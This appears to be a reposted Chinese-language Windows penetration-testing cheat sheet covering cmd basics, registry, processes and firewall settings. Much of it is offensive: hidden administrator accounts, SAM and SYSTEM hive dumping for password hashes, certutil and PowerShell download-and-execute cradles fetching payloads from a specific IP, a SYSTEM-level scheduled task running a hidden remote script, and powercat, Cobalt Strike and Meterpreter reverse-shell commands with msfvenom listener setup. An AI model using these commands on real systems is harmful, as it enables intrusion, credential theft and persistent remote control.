Windows滲透基礎大全
目錄
Windows發(fā)展歷史
Windows中常見的目錄
Windows常見的cmd命令
Windows中cmd窗口的文件下載(bitsadmin、certutil、iwr)
certutil
bitsadmin
iwr
Windows中查找文件
Windows中的計劃任務(schtasks)
Windows中加載并執(zhí)行PowerShell腳本
本地加載并執(zhí)行PowerShell腳本
遠程下載并執(zhí)行PowerShell腳本
Windows中的批處理文件
Windows中快捷鍵操作
Windows中運行窗口的命令
Windows中的注冊表
使用reg保存注冊表中的sam、system、security文件
Windows中的端口
Windows中的進程
常見殺毒軟件進程
監(jiān)聽端口netstat
Windows反彈Shell
一鍵開啟3389遠程桌面
防火墻操作
Windows應急響應
Windows發(fā)展歷史
Microsoft Windows,是美國微軟公司研發(fā)的一套操作系統,它問世于1985年,起初僅僅是DOS模擬環(huán)境,后續(xù)的系統版本由于微軟不斷的更新升級,不但易用,也慢慢的成為家家戶戶人們最喜愛的操作系統。
MS-Dos
WIN 9X
WIN NT
Windows Server
Windows中常見的目錄
C:\Users\xie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 這個目錄下存放著這個用戶開機啟動的程序 C:\programData\Microsoft\Winodws\Start Menu\Programs\StartUp 這個目錄下存放這開機自啟的程序 C:\Windows 這個目錄是系統的安裝目錄 C:\Windows\System32 這個目錄下存放著系統的配置文件 C:\Windows\System32\config\SAM 這個目錄下的SAM文件存放著用戶的登錄賬戶和密碼,要清楚賬戶和密碼,需要進PE系統把這個文件刪掉,對應系統進程: lsass.exe C:\PerfLogs 這個是系統日志目錄
Windows常見的cmd命令
#系統信息 CHCP 65001 修改字體編碼為UTF-8 systeminfo 查看系統信息 hostname 查看主機名 SET 查看環(huán)境變量 color 改變cmd顏色 cls 清除屏幕 set 查看環(huán)境變量 set path 查看指定環(huán)境變量 #網絡 ping -t -l 65500 ip 死亡之ping ipconfig /release 釋放ip ipconfig /renew 重新獲得ip ipconfig /flushdns 刷新DNS緩存 route print 打印路由信息 arp -a 查看arp緩存 net view 查看局域網內其他計算機名稱 netsh firewall show state 防火墻狀態(tài) netsh firewall show config 防火墻規(guī)則 #用戶 whoami 查看系統當前用戶 net user 查看有哪些用戶 net user xie 查看用戶xie的信息 net localgroup 查看組 net localgroup administrators 查看組administrators的信息 net user hack 123 /add 新建一個用戶hack,密碼為123 net user hack$ 123 /add 新建一個隱藏hack用戶,密碼為123 net user hack /del 刪除用戶hack net localgroup administrators hack /add 將普通用戶hack提權到管理員 net user guest /active:yes 激活guest用戶 net user guest /active:no 關閉guest用戶 net password 密碼 更改系統當前登錄用戶密碼 net user guest 密碼 更改guest用戶密碼 #端口進程服務 tasklist 查看進程 tasklist /v 查看進程,顯示進程使用者名稱 netstat -ano 查看系統開放端口 netstat -ano|findstr 80 查看80端口對應的PID tasklist | findstr 80 查看80端口對應的進程 taskkill /f /t /im xx.exe 殺死xx.exe進程 taskkill /F -pid 520 殺死pid為520的進程 net start 查看開啟了哪些服務 net start telnet 開啟telnet服務 net stop telnet 停止 telnet服務 start www.baidu.com 打開網址 #共享 net use 查看連接 net share 查看本地開啟的共享 net share ipc$ 開啟ipc$共享 net share ipc$ /del 刪除ipc$共享 net share c$ /del 刪除C盤共享 net use \192.168.10.15\ipc$ /u:"" "" 與192.168.10.15建立ipc空連接 net use \192.168.10.15 /u:"" "" 與192.168.10.15建立ipc空連接,可以吧ipc$去掉 net use \192.168.10.15 /u:"administrator" "root" 以administrator身份與192.168.10.15建立ipc連接 net use \192.168.10.15 /del 刪除ipc連接 net use \192.168.10.15\c$ /u:"administrator" "root" 建立C盤共享 dir \192.168.10.15\c$ 查看192.168.10.15C盤文件 dir \192.168.10.15\c$\user 查看192.168.10.15C盤文件下的user目錄 dir \192.168.10.15\c$\user\test.exe 查看192.168.10.15C盤文件下的user目錄下的test.exe文件 net use \192.168.10.15\c$ /del 刪除該C盤共享連接 net use k: \192.168.10.15\c$ /u:"administrator" "root" 將目標C盤映射到本地K盤 net use k: /del 刪除該映射 #文件操作 echo hello,word > 1.txt 向1.txt中寫入 hello,word echo hello,word >>1.txt 向1.txt中追加 hello,word del 刪除一個文件 deltree 刪除文件夾和它下面的所有子文件夾還有文件 ren 1.txt 2.txt 將 1.txt 重命名為 2.txt type 1.txt 查看1.txt文件的內容 md 創(chuàng)建一個文件夾 rd 刪除一個文件夾 move 1.txt d:/ 將1.txt文件移動到d盤下 type 123.txt 打開123.txt文件 dir c:\ 查看C盤下的文件 dir c:\ /A 查看C盤下的所有文件,包括隱藏文件 dir c:\ /S 查看C盤下和其子文件夾下的文件 dir c:\ /B 只顯示C盤下的文件名 shutdown -s -t 60 -c “你的電腦被黑了” -s關機 -r重啟 -a取消 copy con A.txt 創(chuàng)建A.txt文本文件; hello,word 輸入內容; 按CTRL+Z鍵,之后再回車; reg save hklm\sam sam.hive reg save hklm\system system.hive 這兩個文件是windows的用戶賬戶數據庫,所有用戶的登錄名以及口令等相關信息都會保存在文件中,這兩條命令是獲取windows管理員的hash值
Windows中cmd窗口的文件下載(bitsadmin、certutil、iwr)
無論是bitsadmin還是certutil,都要將下載的文件放到擁有權限的目錄,否則會提示權限拒絕
certutil
certutil也是windows下一款下載文件的工具,自從WindowsServer 2003就自帶。但是在Server 2003使用會有問題。也就是說,以下命令是在Win7及其以后的機器使用。
certutil -urlcache -split -f http://114.118.80.138/shell.php #下載文件到當前目錄下 certutil -urlcache -split -f http://114.118.80.138/shell.php c:/users/xie/desktop/shell.php #下載文件到指定目錄下
但是該命令的使用會引發(fā)殺毒軟件的查殺,所以在實際滲透中幾乎不適用該命令
bitsadmin
bitsadmin??可以用來在windows 命令行下下載文件。bitsadmin是windows 后臺智能傳輸服務的一個工具,windows 的自動更新,補丁之類的下載就是用這個工具來實現的。Windows Server2003和XP是沒有bitsadmin的,Winc7及其之后的機器才有。
bitsadmin的一些特性:
bitsadmin 可以在網絡不穩(wěn)定的狀態(tài)下下載文件,出錯會自動重試,可靠性應該相當不錯。
bitsadmin 可以跟隨URL跳轉.
bitsadmin 不像curl? wget?這類工具那樣能用來下載HTML頁面。
用法:
bitsadmin /transfer test http://files.cnblogs.com/files/gayhub/bcn.js c:\users\xie\desktop\shell.php # "任務名" 可以隨意起,保存文件的文件路徑必須是已經存在的目錄,否則不能下載。
下載完成后
默認情況下bitsadmin下載速度極慢,下載較大文件需要設置優(yōu)先級提速,以下是用法示例
start bitsadmin /transfer test http://192.168.10.14/test.exe f:\test.exe bitsadmin /setpriority test foreground #設置任務test為最高優(yōu)先級
相關文章:使用bitsadmin.exe 下載文件,配合bcn.bat玩出更多的花樣
iwr
iwr是PowerShell下的一款工具,所以我們如果在cmd下執(zhí)行該命令的話,需要在前面加powershell命令,但是這會被安全軟件檢測到。所以建議在執(zhí)行前,先進入powershell下
iwr -Uri http://www.test.com/vps.exe -OutFile vps.exe -UseBasicParsing
Windows中查找文件
查找C盤下名為abcd.txt的文件
dir /s /b c:\abcd.txt
查找C盤下名為abcd.txt的文件
where /R c:\ abcd.txt
列出指定目錄c:\Program Files\Go\pkg 下的文件內容(依次迭代遍歷)
forfiles /P "c:\Program Files\Go\pkg" /S /M * /C "cmd /c echo @path"
查找指定目錄下c:\Program Files的指定abcd.txt文件
forfiles /P "c:\Program Files" /S /M abcd.txt /C "cmd /c echo @path"
Windows中的計劃任務(schtasks)
schtasks是windows下計劃任務的命令,可以設置在指定時間執(zhí)行指定程序或腳本。
在目標主機上創(chuàng)建一個名為test的計劃任務,啟動程序為C:\vps.exe,啟動權限為system,啟動時間為每小時 schtasks /create /tn test /sc HOURLY /mo 1 /tr c:\vps.exe /ru system /f schtasks /create /tn test /sc onstart/onlogon/HOURLY /mo 1 /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://xx.xx.xx.xx'''))'" /ru system /f 查詢該test計劃任務 schtasks /query | findstr test 啟動該test計劃任務 schtasks /run /i /tn "test" 刪除該test計劃任務 schtasks /delete /tn "test" /f
參數:
/tn:指定計劃任務的名稱
/sc:指定啥時候開始
/sc? onstart? ? ? ? ? ? ?系統啟動的時候執(zhí)行該計劃任務
/sc? onlogon? ? ? ? ? ?用戶登錄的時候執(zhí)行該計劃任務
/sc? onidle -i 30? ? ? 在空閑模式每隔30分鐘執(zhí)行該計劃任務
/sc? hourly? ? ? ? ? ? ? 每隔一小時執(zhí)行該計劃任務
/sc??minute? ? ? ? ? ? ?每隔一分鐘執(zhí)行該計劃任務
/ed :指定啥時候停止該計劃任務,可以使用該參數,則該計劃任務將一直執(zhí)行下去。也可以指定具體的時間:
/ed?01/10/2020 -ET 20:00
/tr:指定運行的程序或腳本
/ru:以什么權限運行,可以是?system?或?%USERNAME%
Windows中加載并執(zhí)行PowerShell腳本
Windows PowerShell 是一種命令行外殼程序和腳本環(huán)境,使命令行用戶和腳本編寫者可以利用?.NET Framework的強大功能。
Windows XP?和 Windows Server 2003是沒有Powershell的,Win7、2008 Server?及其以后的有。更多的關于PowerShell的用法:PowerShell使用淺析
本地加載并執(zhí)行PowerShell腳本
在cmd當前目錄下有PowerView.ps1腳本,并執(zhí)行其中的Get-Netdomain模塊
powershell -exec bypass Import-Module .\powerview.ps1;Get-NetDomain
遠程下載并執(zhí)行PowerShell腳本
遠程下載并執(zhí)行test.ps1腳本、遠程下載PowerView.ps1腳本,并執(zhí)行其中的Get-Netdomain模塊
powershell -exec bypass -c IEX (New-Object System.Net.Webclient).DownloadString('http://xx.xx.xx.xx/test.ps1') powershell -exec bypass -c IEX (New-Object System.Net.Webclient).DownloadString('http://xx.xx.xx.xx/powerview.ps1');import-module .\powerview.ps1;Get-NetDomain
Windows中的批處理文件
@echo off 表示在此語句后所有運行的命令都不顯示命令行本身 echo 顯示這行后面的文字 title 標題 rem 注釋命令 cls 清楚窗口 set /a 賦值 set /p name= 接受用戶輸入,保存在name中 %name% 輸出用戶的輸入 if else 判斷 FOR /F %%i in (ip.txt) do echo %%i #循環(huán)打印出ip.txt內的數據,同一個窗口 FOR /F %%i in (ip.txt) do start echo %%i #循環(huán)打印出ip.txt內的數據,不同窗口 GEQ 大于等于 LSS 小于 goto :1 :2 跳轉到 exit 退出程序 start 啟動文件 call 調用另一個批處理文件 dir c:\*.*>a.txt 將C盤文件列表寫入a.txt del 刪除一個或多個文件
Windows中快捷鍵操作
Alt+Tab 快速切換程序 Alt+F4 快速關閉程序 Alt 矩形選擇 Alt+雙擊文件 查看文件屬性 Shift+delete 永久刪除文件 Ctrl+。 中英文標點切換 Ctrl+S 保存 Ctrl+N 新建 Ctrl+W 關閉程序 Ctrl+U 加下劃線 Ctrl+Z 撤銷操作 Ctrl+B 粗體 Ctrl+I 斜體 Ctrl+shift+esc 快速打開任務管理器 Win+D 快速回到桌面 Win+I 快速打開設置 Win+A 打開操作中心 Win+Q 打開語音助手cortana Win+X 打開windows功能 Win+Pause 我的電腦的屬性
Windows中運行窗口的命令
dxdiag 查詢電腦硬件配置信息 control 控制面板 services.msc 服務 msconfig 系統配置 regedit 注冊表 ncpa.cpl 網絡連接 firewall.cpl 防火墻 devmgmt.msc 設備管理器 diskmgmt.msc 磁盤管理實用 compmgmt.msc 計算機管理 winver 檢查Windows版本 write 寫字板 mspaint 畫圖板 mstsc 遠程桌面連接 magnify 放大鏡實用程序 notepad 打開記事本 shrpubw 創(chuàng)建共享文件夾 calc 啟動計算器 osk 打開屏幕鍵盤
Windows中的注冊表
注冊表(Registry,繁體中文版Windows稱之為登錄)是Microsoft Windows中的一個重要的數據庫,用于存儲系統和應用程序的配置信息
HKEY_CLASSES_ROOT ? ?管理文件系統,根據windows中安裝的應用程序的擴展名,該根鍵指明其文件類型的名稱,相應打開文件所要調用的程序等等信息。
HEKY_CURRENT_USER ? 管理系統當前的用戶信息。在這個根鍵中保存了本地計算機存放的當前登錄的用戶信息,包括用戶登錄用戶名和暫存的密碼。
HKEY_LOCAL_MACHINE ? 管理當前系統硬件配置。在這個根鍵中保存了本地計算機硬件配置數據,此根鍵下的子關鍵字包括在SYSTEM.DAT中,用來提供HKEY_LOCAL_MACHINE所需的信息,或者在遠程計算機中可訪問的一組鍵中
HKEY_USERS ? 管理系統的用戶信息,在這個根鍵中保存了存放在本地計算機口令列表中的用戶標識和密碼列表。同時每個用戶的預配置信息都存儲在HKEY_USERS根鍵中。HKEY_USERS是遠程計算機中訪問的根鍵之一。
HKEY_CURRENT_CONFIG ? 管理當前用戶的系統配置。在這個根鍵中保存著定義當前用戶桌面配置的數據,該用戶使用過的文檔列表。
使用reg保存注冊表中的sam、system、security文件
以下命令需要管理員權限執(zhí)行
reg save hklm\sam c:\users\mi\desktop\sam reg save hklm\system c:\users\mi\desktop\system reg save hklm\security c:\users\mi\desktop\security
Windows中的端口
公認端口:公認端口也稱為常用端口,包括 0-1023 端口
注冊端口:注冊端口包括 1024-49151?端口,它們松散地綁定一些服務
動態(tài)/私有端口:動態(tài)/私有端口包括 49152-65535,這些端口通常不會被分配服務。
關閉端口:
命令行方式關閉端口,實際上是調用了防火墻。以管理員權限打開cmd窗口,執(zhí)行下面命令,以下是演示關閉139端口
netsh advfirewall set allprofile state on netsh advfirewall firewall add rule name=test dir=in action=block protocol=TCP localport=139 #想關閉其他端口,把139替換成其他端口就行
也可以直接在防火墻圖形化界面關閉:
然后一直下一步就可以了
Windows中的進程
windows中包括系統進程和程序進程。
ctrl+shift+esc 打開任務管理器,可以查看進程信息。用戶名為SYSTEM的是系統進程。
一些常見的系統進程和含義:
conime.exe:與輸入法編輯器有關的系統進程,能夠確保正常調整和編輯系統中的輸入法
csrss.exe:該進程是微軟客戶端/服務端運行時子系統,該進行管理windows圖形相關任務
ctfmon.exe:該進程與輸入法有關,該進程的正常運行能夠確保語言欄能正常顯示在任務欄中
explorer.exe:該進程是windows資源管理器,可以說是windows圖形界面外殼程序,該進程的正常運行能夠確保在桌面上顯示桌面圖標和任務欄
lsass.exe:該進行用于windows操作系統的安全機制、本地安全和登錄策略
services.exe:該進程用于啟動和停止系統中的服務,如果用戶手動終止該進程,系統也會重新啟動該進程
smss.exe:該進程用于調用對話管理子系統,負責用戶與操作系統的對話
svchost.exe:該進行是從動態(tài)鏈接庫(DLL)中運行的服務的通用主機進程名稱,如果用戶手動終止該進程,系統也會重新啟動該進程
system:該進程是windows頁面內存管理進程,它能夠確保系統的正常啟動
system idle process:該進行的功能是在CPU空閑時發(fā)出一個命令,使CPU掛起,從而有效降低CPU內核的溫度
winlogon.exe:該進程是Windows NT用戶登錄程序,主要用于管理用戶登錄和退出。
常見殺毒軟件進程
監(jiān)聽端口netstat
windows中使用 netstat 命令用來監(jiān)聽端口
顯示所有的有效連接信息列表,包括監(jiān)聽連接請求(LISTENING )的連接、已建立的連接(ESTABLISHED )、斷開連接(CLOSE_WAIT )或者處于聯機等待狀態(tài)的(TIME_WAIT )等 :netstat -a
以數字形式顯示地址和端口號:netstst -an
除了顯示這些信息外,還顯示進程的PID:netstat -ano
查看被占用端口80對應的應用的PID:netstat -ano | findstr 80
查看80端口被哪個進程或程序占用:tasklist | findstr 80
結束該進程或程序:taskkill? /f? /t? /im? xx.exe? ? ? ??/f 殺死所有進程及? ?/t 強制殺死? ??/im 用鏡像名稱作為進程信息
殺死指定PID的進程:taskkill? -F -pid 520? ? ? ? 殺死PID為520的進程
Windows反彈Shell
cmd窗口下利用Powershell反彈NC shell
親測所有機器都適用
powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 192.168.10.11 -p 8888 -e cmd powershell -nop -exec bypass -c "IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 192.168.10.11 -p 8888 -e cmd.exe"
cmd窗口下利用Powershell反彈CobaltStrike?shell
windows10 經常性不能用。windows 2008R2以下百分百適用。
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://114.118.80.138:8080/a'))" #后臺運行 powershell.exe -c "IEX ((new-object net.webclient).downloadstring('http://114.118.80.138:8080/a'))"
cmd窗口下反彈MSF?shell
VPS上的操作
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=114.128.90.138 lport=7788 -f psh-reflection >7788.ps1 #生成木馬文件 7788.ps1 python -m SimpleHTTPServer 80 #開啟web服務 #MSF監(jiān)聽 use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set lhost 114.118.80.138 set lport 7788 exploit -j
目標機的操作
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://114.118.80.138/7788.ps1');xx.ps1" #后臺運行 或者 powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://114.118.80.138/7788.ps1');xx.ps1"
一鍵開啟3389遠程桌面
先查詢RDP的端口
tasklist /svc | findstr TermService netstat -ano | findstr 上一步查詢到的PID
以下命令需要administrator權限運行
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 如果還是不能連接的話,則是防火墻的問題了。需要關閉防火墻,或者開啟防火墻運行3389端口 關閉防火墻: netsh firewall get opmode disable (WIN2003之前) netsh advfirewall set allprofiles state off (WIN2003之后) 防火墻允許3389端口: netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
防火墻操作
查看防火墻配置: netsh firewall show config 設置防火墻日志存儲位置:netsh advfirewall set currentprofile logging filename "C:\Windows\temp\FirewallLOG.log" 關閉防火墻: netsh firewall get opmode disable (WIN2003之前) netsh advfirewall set allprofiles state off (WIN2003之后) 允許某個程序的全連接 netsh firewall add allowdprogram C:\nc.exe "allow nc" enable (WIN2003之前) 允許某個程序連入 netsh advfirewall firewall add rule name="pass nc" dir=in action=allow program="C:\nc.exe" 允許某個程序外連 netsh advfirewall firewall add rule name="pass nc" dir=in action=allow program="C:\nc.exe" 開啟3389端口 netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
Windows Windows Server
版權聲明:本文內容由網絡用戶投稿,版權歸原作者所有,本站不擁有其著作權,亦不承擔相應法律責任。如果您發(fā)現本站中有涉嫌抄襲或描述失實的內容,請聯系我們jiasou666@gmail.com 處理,核實后本網站將在24小時內刪除侵權內容。
相關文章